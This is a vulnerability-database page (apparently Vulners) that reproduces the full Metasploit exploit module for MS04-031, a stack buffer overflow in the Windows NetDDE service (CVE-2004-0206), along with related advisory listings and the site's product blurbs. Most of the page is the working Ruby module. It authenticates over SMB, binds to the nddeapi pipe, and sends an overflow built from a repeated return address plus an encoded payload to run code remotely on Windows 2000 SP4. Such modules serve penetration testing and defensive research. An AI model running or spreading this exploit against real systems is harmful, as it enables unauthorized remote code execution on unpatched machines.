Lucene search
K

MS04-031 Microsoft NetDDE Service Overflow

🗓️ 21 Jan 2006 22:10:20Reported by pusscat <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 31 Views

MS04-031 Microsoft NetDDE Service Overflow stack buffer overflow in NetDDE service, precursor to DCOM interface. Only affects OS prior to Win XP SP1 (2000 SP4, XP SP0). Requires authentication for NDDEAPI pipe access

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2004-0206
3 Jul 201000:00
circl
CVE
CVE-2004-0206
16 Oct 200404:00
cve
Cvelist
CVE-2004-0206
16 Oct 200404:00
cvelist
Exploit DB
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
3 Jul 201000:00
exploitdb
canvas
Immunity Canvas: MS04_031
3 Nov 200405:00
canvas
Tenable Nessus
MS04-031: Vulnerability NetDDE Could Allow Code Execution (841533) (uncredentialed check)
27 Oct 200400:00
nessus
Tenable Nessus
MS04-031: Vulnerability in NetDDE Could Allow Code Execution (841533)
12 Oct 200400:00
nessus
NVD
CVE-2004-0206
3 Nov 200405:00
nvd
Packet Storm
Microsoft NetDDE Service Overflow
26 Nov 200900:00
packetstorm
Saint
Windows NetDDE buffer overflow
24 Feb 200600:00
saint
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS04-031 Microsoft NetDDE Service Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the NetDDE service, which is the
        precursor to the DCOM interface.  This exploit effects only operating systems
        released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
        that this vulnerability can be exploited without authentication, the NDDEAPI
        pipe is only accessible after successful authentication.
      },
      'Author'         => [ 'pusscat' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0206'],
          [ 'OSVDB', '10689'],
          [ 'BID', '11372'],
          [ 'MSB', 'MS04-031'],

        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Space'    => (0x600 - (133*4) - 4),
          'BadChars' => "\\/.:$\x00",       # \ / . : $ NULL
          'Prepend'  => 'A' * 8,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ],  # push esp, ret :)
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2004-10-12'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (nddeapi)", 'nddeapi']),
      ])
  end

  def exploit
    connect()
    smb_login()
    print_status("Trying target #{target.name}...")

    handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    retOverWrite =
      'AA' + (NDR.long(target.ret) * 133) + payload.encoded

    overflowChunk =
      retOverWrite +
      NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
      NDR.long(0x0)

    stubdata =
      NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
      NDR.long(rand(0xFFFFFFFF))

    print_status('Calling the vulnerable function...')

    begin
      response = dcerpc.call(0xc, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.80399
31